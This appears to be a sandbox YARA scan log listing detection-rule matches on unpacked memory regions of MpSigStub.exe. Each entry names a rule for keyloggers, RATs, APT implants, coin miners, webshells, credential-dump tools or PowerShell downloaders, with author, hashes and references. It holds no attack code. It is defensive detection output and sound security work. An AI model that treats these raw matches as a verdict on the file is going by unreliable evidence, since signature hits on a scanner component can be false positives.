Source: 11.3.MpSigStub.exe.21b5f17c82d.93.raw.unpack, type: UNPACKEDPE Matched rule: HackTool_Samples description = Hacktool, score =
Source: 11.3.MpSigStub.exe.21b5e4c253a.157.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
Source: 11.3.MpSigStub.exe.21b5f568a3a.106.raw.unpack, type: UNPACKEDPE Matched rule: Trojan_Win32_PlaKeylog_B author = Microsoft, description = Keylogger component, activity_group = Platinum, version = 1.0, unpacked_sample_sha1 = 6a1412daaa9bdc553689537df0a004d44f8a45fd, last_modified = 2016-04-12, original_sample_sha1 = 0096a3e0c97b85ca75164f48230ae530c94a2b77
Source: 11.3.MpSigStub.exe.21b5f568a3a.106.raw.unpack, type: UNPACKEDPE Matched rule: APT_DNSpionage_Karkoff_Malware_Apr19_1 date = 2019-04-24, hash4 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, hash3 = 5b102bf4d997688268bab45336cead7cdf188eb0d6355764e53b4f62e1cdf30c, hash2 = b017b9fc2484ce0a5629ff1fed15bca9f62f942eafbb74da6a40f40337187b04, hash1 = 6a251ed6a2c6a0a2be11f2a945ec68c814d27e2b6ef445f4b2c7a779620baa11, author = Florian Roth, description = Detects DNSpionage Karkoff malware, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 11.3.MpSigStub.exe.21b5f568a3a.106.raw.unpack, type: UNPACKEDPE Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: 11.3.MpSigStub.exe.21b5f568a3a.106.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_DropperBackdoor_Keywords date = 2019-04-24, hash1 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, author = Florian Roth, description = Detects suspicious keywords that indicate a backdoor, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 11.3.MpSigStub.exe.21b5f568a3a.106.raw.unpack, type: UNPACKEDPE Matched rule: APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_3 date = 2019-04-13, hash3 = ddea408e178f0412ae78ff5d5adf2439251f68cad4fd853ee466a3c74649642d, hash2 = 05feed9762bc46b47a7dc5c469add9f163c16df4ddaafe81983a628da5714461, hash1 = 2151c1977b4555a1761c12f151969f8e853e26c396fa1a7b74ccbaf3a48f4525, author = Florian Roth, description = Detects HOPLIGHT malware used by HiddenCobra APT group, reference = https://www.us-cert.gov/ncas/analysis-reports/AR19-100A
Source: 11.3.MpSigStub.exe.21b5f96bf0d.38.raw.unpack, type: UNPACKEDPE Matched rule: TA17_293A_malware_1 date = 2017/07/17, hash5 = 038A97B4E2F37F34B255F0643E49FC9D, hash4 = 04738CA02F59A5CD394998A99FCD9613, hash3 = 8943E71A8C73B5E343AA9D2E19002373, hash2 = BA756DD64C1147515BA2298B6A760260, hash1 = A07AA521E7CAFB360294E56969EDA5D6, hash0 = 61C909D2F625223DB2FB858BBDF42A76, author = US-CERT Code Analysis Team (modified by Florian Roth), description = inveigh pen testing tools & related artifacts, hash10 = 4595DBE00A538DF127E0079294C87DA0, hash9 = 722154A36F32BA10E98020A8AD758A7A, hash8 = 5DBEF7BDDAF50624E840CCBCE2816594, hash7 = AA905A3508D9309A93AD5C0EC26EBC9B, hash6 = 65A1A73253F04354886F375B59550B46, reference = https://www.us-cert.gov/ncas/alerts/TA17-293A
Source: 11.3.MpSigStub.exe.21b5f96bf0d.38.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5fe69132.113.raw.unpack, type: UNPACKEDPE Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 11.3.MpSigStub.exe.21b5fe69132.113.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5fe69132.113.raw.unpack, type: UNPACKEDPE Matched rule: APT_DeputyDog_Fexel author = ThreatConnect Intelligence Research Team
Source: 11.3.MpSigStub.exe.21b5e5ccab6.147.unpack, type: UNPACKEDPE Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 11.3.MpSigStub.exe.21b5ef9be4d.110.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5ef9be4d.110.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 11.3.MpSigStub.exe.21b5f3c57a6.43.raw.unpack, type: UNPACKEDPE Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 11.3.MpSigStub.exe.21b5f3c57a6.43.raw.unpack, type: UNPACKEDPE Matched rule: Derusbi_Kernel_Driver_WD_UDFS date = 2015-12-15, hash4 = e27fb16dce7fff714f4b05f2cef53e1919a34d7ec0e595f2eaa155861a213e59, hash3 = 6cdb65dbfb2c236b6d149fd9836cb484d0608ea082cf5bd88edde31ad11a0d58, hash2 = 50174311e524b97ea5cb4f3ea571dd477d1f0eee06cd3ed73af39a15f3e6484a, author = Florian Roth, description = Detects Derusbi Kernel Driver, reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 1b449121300b0188ff9f6a8c399fb818d0cf53fd36cf012e6908a2665a27f016
Source: 11.3.MpSigStub.exe.21b5f3c57a6.43.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 11.3.MpSigStub.exe.21b5ef99445.153.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5ef99445.153.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 11.3.MpSigStub.exe.21b5ef9a849.152.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5ef9a849.152.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 11.3.MpSigStub.exe.21b5e61fb1a.206.raw.unpack, type: UNPACKEDPE Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 11.3.MpSigStub.exe.21b5e721bfe.71.raw.unpack, type: UNPACKEDPE Matched rule: clearlog date = 2017-06-02, hash1 = 14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3, author = Florian Roth, description = Detects Fireball malware - file clearlog.dll, reference = https://goo.gl/4pTkGQ, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5f5daeae.14.unpack, type: UNPACKEDPE Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5f5daeae.14.unpack, type: UNPACKEDPE Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 11.3.MpSigStub.exe.21b5f5daeae.14.unpack, type: UNPACKEDPE Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 11.3.MpSigStub.exe.21b5f5daeae.14.unpack, type: UNPACKEDPE Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 11.3.MpSigStub.exe.21b5f5daeae.14.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5e1d93b1.181.raw.unpack, type: UNPACKEDPE Matched rule: XOR_4byte_Key date = 2015-12-15, author = Florian Roth, description = Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan), reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 11.3.MpSigStub.exe.21b5fece56a.185.raw.unpack, type: UNPACKEDPE Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 11.3.MpSigStub.exe.21b5fece56a.185.raw.unpack, type: UNPACKEDPE Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 11.3.MpSigStub.exe.21b5fece56a.185.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 11.3.MpSigStub.exe.21b5ef9be4d.151.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5ef9be4d.151.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 11.3.MpSigStub.exe.21b5f3c49a2.45.raw.unpack, type: UNPACKEDPE Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 11.3.MpSigStub.exe.21b5f3c49a2.45.raw.unpack, type: UNPACKEDPE Matched rule: Derusbi_Kernel_Driver_WD_UDFS date = 2015-12-15, hash4 = e27fb16dce7fff714f4b05f2cef53e1919a34d7ec0e595f2eaa155861a213e59, hash3 = 6cdb65dbfb2c236b6d149fd9836cb484d0608ea082cf5bd88edde31ad11a0d58, hash2 = 50174311e524b97ea5cb4f3ea571dd477d1f0eee06cd3ed73af39a15f3e6484a, author = Florian Roth, description = Detects Derusbi Kernel Driver, reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 1b449121300b0188ff9f6a8c399fb818d0cf53fd36cf012e6908a2665a27f016
Source: 11.3.MpSigStub.exe.21b5f3c49a2.45.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 11.3.MpSigStub.exe.21b5eec4df6.209.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5ef99445.124.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5ef99445.124.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 11.3.MpSigStub.exe.21b5f568236.104.raw.unpack, type: UNPACKEDPE Matched rule: Trojan_Win32_PlaKeylog_B author = Microsoft, description = Keylogger component, activity_group = Platinum, version = 1.0, unpacked_sample_sha1 = 6a1412daaa9bdc553689537df0a004d44f8a45fd, last_modified = 2016-04-12, original_sample_sha1 = 0096a3e0c97b85ca75164f48230ae530c94a2b77
Source: 11.3.MpSigStub.exe.21b5f568236.104.raw.unpack, type: UNPACKEDPE Matched rule: APT_DNSpionage_Karkoff_Malware_Apr19_1 date = 2019-04-24, hash4 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, hash3 = 5b102bf4d997688268bab45336cead7cdf188eb0d6355764e53b4f62e1cdf30c, hash2 = b017b9fc2484ce0a5629ff1fed15bca9f62f942eafbb74da6a40f40337187b04, hash1 = 6a251ed6a2c6a0a2be11f2a945ec68c814d27e2b6ef445f4b2c7a779620baa11, author = Florian Roth, description = Detects DNSpionage Karkoff malware, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 11.3.MpSigStub.exe.21b5f568236.104.raw.unpack, type: UNPACKEDPE Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: 11.3.MpSigStub.exe.21b5f568236.104.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_DropperBackdoor_Keywords date = 2019-04-24, hash1 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, author = Florian Roth, description = Detects suspicious keywords that indicate a backdoor, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 11.3.MpSigStub.exe.21b5f568236.104.raw.unpack, type: UNPACKEDPE Matched rule: APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_3 date = 2019-04-13, hash3 = ddea408e178f0412ae78ff5d5adf2439251f68cad4fd853ee466a3c74649642d, hash2 = 05feed9762bc46b47a7dc5c469add9f163c16df4ddaafe81983a628da5714461, hash1 = 2151c1977b4555a1761c12f151969f8e853e26c396fa1a7b74ccbaf3a48f4525, author = Florian Roth, description = Detects HOPLIGHT malware used by HiddenCobra APT group, reference = https://www.us-cert.gov/ncas/analysis-reports/AR19-100A
Source: 11.3.MpSigStub.exe.21b5e4419f1.88.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_PDB_Path_Keywords date = 2019-10-04, author = Florian Roth, description = Detects suspicious PDB paths, reference = https://twitter.com/stvemillertime/status/1179832666285326337?s=20
Source: 11.3.MpSigStub.exe.21b5fcdc99a.187.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5ef99445.111.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5ef99445.111.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 11.3.MpSigStub.exe.21b5ef9be4d.125.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5ef9be4d.125.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 11.3.MpSigStub.exe.21b5e61fb1a.216.unpack, type: UNPACKEDPE Matched rule: MAL_Turla_Agent_BTZ date = 2018-04-12, hash1 = c4a1cd6916646aa502413d42e6e7441c6e7268926484f19d9acbf5113fc52fc8, author = Florian Roth, description = Detects Turla Agent.BTZ, reference = https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5e61fb1a.216.unpack, type: UNPACKEDPE Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 11.3.MpSigStub.exe.21b5f9698b9.37.raw.unpack, type: UNPACKEDPE Matched rule: TA17_293A_malware_1 date = 2017/07/17, hash5 = 038A97B4E2F37F34B255F0643E49FC9D, hash4 = 04738CA02F59A5CD394998A99FCD9613, hash3 = 8943E71A8C73B5E343AA9D2E19002373, hash2 = BA756DD64C1147515BA2298B6A760260, hash1 = A07AA521E7CAFB360294E56969EDA5D6, hash0 = 61C909D2F625223DB2FB858BBDF42A76, author = US-CERT Code Analysis Team (modified by Florian Roth), description = inveigh pen testing tools & related artifacts, hash10 = 4595DBE00A538DF127E0079294C87DA0, hash9 = 722154A36F32BA10E98020A8AD758A7A, hash8 = 5DBEF7BDDAF50624E840CCBCE2816594, hash7 = AA905A3508D9309A93AD5C0EC26EBC9B, hash6 = 65A1A73253F04354886F375B59550B46, reference = https://www.us-cert.gov/ncas/alerts/TA17-293A
Source: 11.3.MpSigStub.exe.21b5f9698b9.37.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5f62017a.58.raw.unpack, type: UNPACKEDPE Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5f62017a.58.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_PDB_Strings_Keylogger_Backdoor date = 2018-03-23, author = Florian Roth, description = Detects PDB strings used in backdoors or keyloggers, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 11.3.MpSigStub.exe.21b5fef5492.85.raw.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 11.3.MpSigStub.exe.21b5fef5492.85.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6
Source: 11.3.MpSigStub.exe.21b5fef5492.85.raw.unpack, type: UNPACKEDPE Matched rule: APT_PupyRAT_PY date = 2017-02-17, hash1 = 8d89f53b0a6558d6bb9cdbc9f218ef699f3c87dd06bc03dd042290dedc18cb71, author = Florian Roth, description = Detects Pupy RAT, reference = https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5fef5492.85.raw.unpack, type: UNPACKEDPE Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5fef5492.85.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5f94bc01.57.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5fed0d72.184.raw.unpack, type: UNPACKEDPE Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 11.3.MpSigStub.exe.21b5fed0d72.184.raw.unpack, type: UNPACKEDPE Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 11.3.MpSigStub.exe.21b5fed0d72.184.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 11.3.MpSigStub.exe.21b5ef9a849.126.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5ef9a849.126.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 11.3.MpSigStub.exe.21b5ea0fb92.56.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 11.3.MpSigStub.exe.21b5e1c15c6.201.raw.unpack, type: UNPACKEDPE Matched rule: APT_apt_duqu2_loaders copyright = Kaspersky Lab, description = Rule to detect Duqu 2.0 samples, version = 1.0, last_modified = 2015-06-09
Source: 11.3.MpSigStub.exe.21b5e1c15c6.201.raw.unpack, type: UNPACKEDPE Matched rule: apt_duqu2_loaders copyright = Kaspersky Lab, description = Rule to detect Duqu 2.0 samples, version = 1.0, last_modified = 2015-06-09
Source: 11.3.MpSigStub.exe.21b5e21f4fa.19.raw.unpack, type: UNPACKEDPE Matched rule: Molerats_Jul17_Sample_5 date = 2017-07-07, hash1 = ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5e21f4fa.19.raw.unpack, type: UNPACKEDPE Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: 11.3.MpSigStub.exe.21b5e7211fa.70.raw.unpack, type: UNPACKEDPE Matched rule: clearlog date = 2017-06-02, hash1 = 14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3, author = Florian Roth, description = Detects Fireball malware - file clearlog.dll, reference = https://goo.gl/4pTkGQ, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
